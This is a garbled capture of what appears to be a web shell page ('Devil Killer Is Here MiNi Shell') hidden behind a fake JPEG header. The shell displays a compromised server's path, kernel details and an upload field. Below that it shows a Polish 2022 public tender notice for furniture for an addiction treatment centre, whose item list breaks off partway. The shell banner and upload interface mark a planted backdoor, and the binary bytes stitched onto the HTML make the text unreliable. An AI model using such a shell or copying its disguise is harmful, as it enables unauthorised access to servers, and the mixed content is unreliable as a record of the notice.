JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221018/0039756901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „DOSTAWA MEBLI NA POTRZEBY PACJENTÓW OŚRODKA” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK DLA OSÓB UZALEŻNIONYCH SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ &#34;NOWY DWOREK&#34;</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Nowy Dworek</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001286406</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">46</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowy Dworek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">68 38 101 67</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">68 38 101 67 wew.11</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@nowydworek.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://nowydworek.com/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „DOSTAWA MEBLI NA POTRZEBY PACJENTÓW OŚRODKA” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-702c565c-4ebe-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00397569</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00315836/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 „DOSTAWA MEBLI NA POTRZEBY PACJENTÓW OŚRODKA”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-702c565c-4ebe-11ed-9171-f6b7c7d59353 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">3.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się za pomocą platformy internetowej e-zamówienia.gov.pl która dostępna jest pod adresem: https://ezamowienia.uzp.gov.pl na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia.<br/>Adres Platformy e-Zamówienia: https://ezamowienia.gov.pl<br/>Adres Elektronicznej Skrzynki Podawcza ze skrytką: /Osrodek_SPZOZND/Skład_ESP<br/>dostępnej pod adresem: https://epuap.gov.pl/wps/portal/strefa-klienta/katalog-spraw/profil-urzedu/Osrodek_SPZOZND <br/>oraz poczty elektronicznej e-mail: przetargi@nowydworek.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym, a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). <br/>2.	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt . Ofertę, a także oświadczenie składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym . <br/>4.	Wykonawca zamierzający wziąć udział w postepowaniu o udzielenie zamówienia publicznego, musi posiadać konto użytkownika na Platformie e-Zamówienia zarejestrowane jako Wykonawca i posiadające rolę „Przygotowanie ofert/wniosków/prac konkursowych”. Wykonawca posiadający konto ma dostęp do następujących formularzy : „Formularz do złożenia, zmiany , wycofania oferty lub wniosku” oraz „Formularz do komunikacji” który można znaleźć w Informacjach podstawowych zamówienia.<br/>5.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy e-zamówienia pod adresem https://ezamowienia.gov.pl/pl/regulamin <br/>6.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku&#34; i „Formularza do komunikacji&#34; wynosi 150 MB.<br/>7.	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na Platformie.<br/>8.	Zamawiający przekazuje link do postępowania oraz Identyfikator postępowania jako Załącznik nr 4 do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w e-zamówienia klikając wcześniej opcję „Przeglądaj postępowania&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z realizacją wymogów Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) („RODO&#34;), Ośrodek dla Osób Uzależnionych SPZOZ „Nowy Dworek” (dalej SPZOZ Nowy Dworek) niniejszym informuje o zasadach oraz o przysługujących Państwu prawach związanych z przetwarzaniem przez SPZOZ Nowy Dworek Państwa danych osobowych.<br/>1.	Wskazanie administratora: Administratorem Państwa danych osobowych jest Dyrektor SPZOZ Nowy Dworek mający siedzibę Nowy Dworek 46, 66-200 Świebodzin - zwany dalej „ Administratorem&#34;.<br/>2.	Cele oraz podstawa prawna przetwarzania Pani/Pana danych osobowych: SPZOZ Nowy Dworek przetwarza Pani/Pana dane osobowe na podstawie art. 6 ust. 1 lit. c) RODO, w związku z realizacją celów określonych w ustawie z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), zwanej dalej „ustawą Pzp&#34;.<br/>3.	Źródło pozyskiwania danych osobowych: Państwa dane osobowe zostały zebrane bezpośrednio od Państwa i nie będą wykorzystywane w innym celu niż przeprowadzenie procedury przetargowej.<br/>4.	Obowiązek podania danych osobowych: Podanie przez Państwa danych osobowych jest wymogiem ustawy Pzp lub jest niezbędne do realizacji obowiązku wynikającego z jej<br/>postanowień i jest konieczne do wzięcia udziału w postępowaniu o udzielenie zamówienia publicznego.<br/>5.	Informacje o odbiorcach Państwa danych osobowych: Państwa dane osobowe mogą być udostępniane innym podmiotom, uprawnionym do ich otrzymywania na podstawie obowiązujących przepisów prawa, w szczególności art. 18 i art. 70 ustawy Pzp, a ponadto odbiorcom danych w rozumieniu przepisów o ochronie danych osobowych, tj. podmiotom świadczącym usługi pocztowe, kurierskie, usługi informatyczne, bankowe, ubezpieczeniowe, Wykonawcom biorącym udział w postępowaniu o udzielenie zamówienia publicznego.<br/>6.	Okresy przetwarzania danych osobowych: Państwa dane osobowe będą przetwarzane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego lub przez cały czas trwania umowy, jeżeli przekracza on okres 5 lat.<br/>7.	Profilowanie oraz zautomatyzowane podejmowanie decyzji: Nie będą Państwo podlegać decyzjom podejmowanym w sposób zautomatyzowany. Państwa dane osobowe nie będą również wykorzystywane do profilowania.<br/>8.	Prawa osoby, której dane dotyczą: SPZOZ Nowy Dworek pragnie zapewnić Państwa, że wszystkim osobom, których danych osobowe są przetwarzane przysługują odpowiednie prawa wynikające z RODO.<br/>W związku z tym, przysługują Państwu następujące prawa:<br/>-	prawo dostępu do danych osobowych, w tym prawo do uzyskania kopii tych danych;<br/>-	prawo żądania sprostowania (poprawiania) danych osobowych;<br/>-	prawo żądania ograniczenia przetwarzania danych;<br/>-	prawo wniesienia skargi do organu nadzorczego.<br/>9.	Przekazywanie danych osobowych do podmiotów spoza Europejskiego Obszaru Gospodarczego („EOG&#34;) lub organizacji międzynarodowych: Administrator nie udostępnia Państwa danych osobowych podmiotom mającym siedzibę poza EOG, oraz organizacjom międzynarodowym.<br/>W przypadku pytań dotyczących sposobu i zakresu przetwarzania Państwa danych osobowych przez SPZOZ Nowy Dworek , a także przysługujących Państwu uprawnień, prosimy o kontakt z inspektorem ochrony osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">5/ZP/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 384633,43 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 310758,89 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 1 – Łóżka<br/><br/>Lp	Rodzaj	Ilość (szt. )	Wymiary (szer./wys./długość.)	Kolor	parametry techniczne<br/>1.	łóżko typu tapczan	100	85x45x200	ciemnoszary	twardość gąbki &#34;30&#34;, sprężyna wysokość 11 cm, przekrój drutu 24 mm, wysokość zagłówka i boku 70 cm, grubość zagłówka 2cm, obite materiałem takim samym jak poszycie łóżka, wysokość siedziska 45cm </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 110700,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39150000-8 - Różne meble i wyposażenie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39143110-0 - Łóżka i kanapy oraz specjalne meble tapicerowane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena (C) – waga kryterium 60%; ( w zł)<br/>Okres gwarancji (G) - waga kryterium 40%; ( w miesiącach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 2 – Szafy, regały i inne<br/><br/>lp.	Rodzaj	Ilość (szt lub kpl)	Wymiary (szer./wys./głęb.)	Kolor	materiał	Półki/ wymiar	Szuflady/kosze/pojemniki wysuwane	Drążek na wieszaki<br/>1.	Biurko	2	100x60 biurko, dąb bejcowany na biało/czarny,	Płyta pilśniowa, Nadrukowana i wytłoczona farba akrylowa	0	0	0<br/>2.	Biurko	6	73x50	Imit. dębu	Płyta wiórowa, Płyta meblowa	0	0	0<br/>3.	Fotel	10	typ finka	jasnobeżowy	drewno + tkanina tapicerska	0	0	0<br/>4.	Fotel	2	75x64 czarny	Fotel, czarny/czarny/ drewno/tkanina	0	0	0<br/>5.	Komoda	1	80x100	dąb olejowany na biało	płyta meblowa	0	4	0<br/>6.	Komoda	1	80x78 dąb olejowany na biało	płyta meblowa	0	3	0<br/>7.	komoda	6	40x78	biały	płyta meblowa	0	3 <br/>8.	Komoda	1	80x100x48	biały	płyta meblowa	0	4 <br/>9.	Komoda	1	100x80	czarny brąz płyta meblowa	0	4	0<br/>10.	Komoda	11	35x49	czarny brąz płyta meblowa	0	2	0<br/>11.	Komoda	1	78x80	czarny brąz płyta meblowa	0	3	0<br/>12.	Komoda	2	140x72	biały	płyta meblowa	0	6	0<br/>13.	Komoda	1	70x112	biały	płyta meblowa	0	5	0<br/>14.	Komoda	1	80x123	biały	płyta meblowa	0	6	0<br/>15.	Komoda	6	80x54x47	biały	płyta meblowa	0	2	0<br/>16.	Komoda	5	80x100x48	biały	płyta meblowa	0	4	0<br/>17.	Komoda/kontener	1	40x47x56	biały	metalowa, na kółkach, zamykany na klucz	0	3	0<br/>18.	Krzesło	10	81x46	bambus - drewno/Biały	Okleina klejona warstwowo, okleina brzozowa, Farba akrylowa	0	0	0<br/>19.	Krzesło 6	86x49	krzesło, czarny/czarny	Gięta sklejka, laminat, Bezbarwny lakier akrylowy	0	0	0<br/>20.	Krzesło biurowe	3	Szerokość: 62 cm Głębokość: 60 cm Minimalna wysokość: 129 cm Maksymalna wysokość: 140 cm czarny	metal, siatka materiałowa oddychająca	0	0	0<br/>21.	Krzesło biurowe obrotowe	4	Głębokość: 67 cm, Maksymalna wysokość: 110 cm, Maksymalna wysokość siedziska: 55 cm, Minimalna wysokość siedziska: 43 cm	czarne poliuretan, poliester, bawełna	0	0	0<br/>22.	Meble kuchenne, szafki dolne x 2	1	183x122x91 cm	biały	płyta meblowa	3	1	0<br/>23.	Meble kuchenne - 3x szafki dolne, 2x szafki wiszące	3	243x164x220	biały	płyta meblowa	5	5	0<br/>24.	Półka na buty	20	52x39x18	biały	plastik	2	2	0<br/>25.	Półka na buty	15	52x39x18	czarna	plastik	2	2	0<br/>26.	Regał	1	80x28x202	dębowy bejcowany na biało	płyta meblowa	5	0	0<br/>27.	Regał	1	40x28x202	biały	płyta meblowa	5	0	0<br/>28.	Regał Para drzwi panel płyta meblowa/szkło	1	160x30x202	brąz okleina jesion/szkło	płyta meblowa	5	0	0<br/>29.	Słupek	13	50x64x201	dąb bejcowany na biało	płyta meblowa	50*58cm 52 szt.	26	0<br/>30.	Słupek łazienkowy	3	30x27x190	biały	płyta meblowa	5 sztuk	0	0<br/>31.	Słupek/ pojedyncza szafa z drzwiami	18	50x41x235	dąb bejcowany na biało	płyta meblowa/ drzwi w kolorze drewna	91 szt,50x35 cm	0	0<br/>32.	Słupek/ szafa z drzwiami	12	100 (50x2)x58x201	obudowa biała, drzwi dąb bejcowany na biało	płyta meblowa	5szt biała 50x58 cm	2	1 szt drążek biały 50 cm<br/>33.	Słupek/ szafa z pojedynczymi drzwiami	35	51x201x62	dąb bejcowany na biało, obudowa biała	płyta meblowa	50x58- 140szt	2	0<br/>34.	Sofa 3 osobowa	2	195x86x74 szary	Płyta wiórowa, Płyta pilśniowa, Lita sosna, Pianka poliuretanowa 30 kg/m3	0	0	0<br/>35.	Sofa 3 osobowa	3	197x76x80.5	czarny	100 % poliester, sklejka, włóknina polipropylenowa, watolina poliestrowa, wkładka filcowa, Drewno w okleinie laminowanej, Pianka poliuretanowa 25 kg/m3, Płyta pilśniowa	0	0	0<br/>36.	Stolik	52	55x55	biały, dąb bejcowany na biało	płyta wiórowa	0	0	0<br/>37.	Stolik	5	37x28 czarny	stal, Epoksydowa/poliestrowa powłoka proszkowa	0	0	0<br/>38.	Stolik	5	45x53	czarny	stal, Epoksydowa/poliestrowa powłoka proszkowa	0	0	0<br/>39.	Stolik	1	okrągły, 2 stoliki, komplet, wysokość 1 - 51cm, wysokość 2 - 45cm	czarny	lity buk, płyta pilśniowa	0	0	0<br/>40.	Stolik	1	90x55	czarnobrązowy stolik	płyta wiórowa	0	0	0<br/>41.	Stolik	8	90x55	dąb bejcowany na biało	płyta wiórowa	0	0	0<br/>42.	Stolik kawowy	1	90x55	biały	drewno	1	0	0<br/>43.	Stolik rtv	1	90x35x40	biały	płyta wiórowa	2	0	0<br/>44.	Stoły kuchenne 8	135x85 stół, chrom/połysk biały	Płyta wiórowa, 0	0	0<br/>45.	Stół	1	118x78 dąb olejowany na biało	Płyta wiórowa	0	0	0<br/>46.	Stół	8	125x75	biały	płyta wiórowa, stal	0	0	0<br/>47.	Stół	1	67x67	czarny	płyta wiórowa, stal	0	0	0<br/>48.	Stół kuchenny	1	147x204x95	stół rozkładany, bejca patynowa	drewno, sosna	0	0	0<br/>49.	Szafa	10	100x201x62	dąb bejcowany na biało, obudowa biała	płyta meblowa	100x58 - 20 szt	0	biały 100 cm - 10 szt<br/>50.	Szafa	5	100x236x35	dąb olejowany na biało	płyta meblowa	100x35 - 70szt 20	0<br/>51.	Szafa	5	50x236x35	dąb olejowany na biało	płyta meblowa	50x35 - 80szt	0	0<br/>52.	Szafa	9	75x236x35	dąb olejowany na biało	płyta meblowa	75x35 -108szt	36	0<br/>53.	Szafa	4	75x35x201	dąb olejowany na biało	płyta meblowa	75x35 - 36szt	16	0<br/>54.	Szafa	8	80x181x41	biały	płyta meblowa	80x40 - 12szt	32	0<br/>55.	Szafa	10	100x64x201	biały korpus drzwi :dąb bejcowany na biało	płyta meblowa	18 szt.100*58 cm	0	drążęk na wieszaki 100cm- 9 szt. <br/>56.	Szafa	23	75x64x236	dąb bejcowany na biało	płyta meblowa	80 szt, 75x58 cm	0	drążek na wieszaki biały 75 cm<br/>57.	Szafa	1	100x236x62	biały	dąb bejcowany na biało	3x, 100x58	2	1x, 100cm<br/>58.	Szafa	1	151x236x62	biały	płyta meblowa	3x, 50x58<br/>1x, 100x58	3	1x, 100cm<br/>1x, 50cm<br/>59.	Szafa	1	151x236x62	biały	płyta meblowa	4x, 50x58<br/>2x, 100x58	3	1x, 100cm<br/>1x, 50cm<br/>60.	Szafa	1	160x236x111	biały	dąb bejcowany na biało	2x, 50x351x, 100x585x, 50x58	3	2x, 100cm<br/>61.	Szafa	1	175x236x39	biały	płyta meblowa	1x, 100x35<br/>7x, 75x35	4	1x, 100cm<br/>62.	Szafa	1	200x236x39	biały	płyta meblowa	6x, 100x35	4	2x, 100x35<br/>63.	Szafa	1	200x236x62	biały	dąb bejcowany na biało	6x, 100x58	4	2x, 100cm<br/>64.	Szafa	1	251x236x62	biały	płyta meblowa	4x, 100x58<br/>7x, 50x58	4	2x, 100cm<br/>65.	Szafa	1	300x326x62	biały	dąb bejcowany na biało	12x, 100x58	3	